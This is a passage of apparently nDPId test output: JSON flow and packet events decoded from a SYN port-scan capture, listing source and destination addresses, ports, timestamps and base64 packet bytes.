+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsph4AADQGblSsEAAIQA2GNIzTnQHdU4MZAAAAAGACBACXigAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsS7UAACoG0r2sEAAIQA2GNIzTPozdU4MZAAAAAGACDADt\/wAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060803,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_packet_id":1,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060803,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPsAADcGaHesEAAIQA2GNIzT0x3dU4MZAAAAAGACEABVbgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsxjsAADYGTDesEAAIQA2GNIzTIPvdU4MZAAAAAGACDAALkQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFQcAADMGAGysEAAIQA2GNIzTD5LdU4MZAAAAAGACEAAY+gAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsW8oAADQGuKisEAAIQA2GNIzTBFndU4MZAAAAAGACBAAwMwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAADsGlfGsEAAIQA2GNIzSBFPdUoMYAAAAAGACEAAkPAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2YAADIGxwysEAAIQA2GNIzSAnzdUoMYAAAAAGACDAAqEwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsWvQAADMGun6sEAAIQA2GNIzSE77dUoMYAAAAAGACEAAU0QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAseRIAACwGo2CsEAAIQA2GNIzSBTbdUoMYAAAAAGACBAAvWQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsrV0AADcGZBWsEAAIQA2GNIzSA\/\/dUoMYAAAAAGACEAAkkAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs4YkAADEGNemsEAAIQA2GNIzSA4fdUoMYAAAAAGACCAAtCAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ20AADAG8QWsEAAIQA2GNIzSAGTdUoMYAAAAAGACBAA0KwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs1gMAADkGOW+sEAAIQA2GNIzSDnfdUoMYAAAAAGACCAAiGAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsVUAAADgGuzKsEAAIQA2GNIzSBATdUoMYAAAAAGACBAAwiwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsmTIAAC0GgkCsEAAIQA2GNIzSA4TdUoMYAAAAAGACCAAtCwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsR1MAACsG1h+sEAAIQA2GNIzSA2ndUoMYAAAAAGACEAAlJgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsFScAADsG+EusEAAIQA2GNIzSAHfdUoMYAAAAAGACEAAoGAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kcAACoGJCusEAAIQA2GNIzSZmbdUoMYAAAAAGACDADGKAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsd6gAAC0Go8qsEAAIQA2GNIzSUVzdUoMYAAAAAGACCADfMgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzTgBDdU4MZAAAAAGACBAC0ewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs6v8AADQGKXOsEAAIQA2GNIzTCzvdU4MZAAAAAGACBAApUQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsPkcAAC8G2yusEAAIQA2GNIzTBGrdU4MZAAAAAGACEAAkIgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsk0UAACgGjS2sEAAIQA2GNIzTwPjdU4MZAAAAAGACBABzkwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
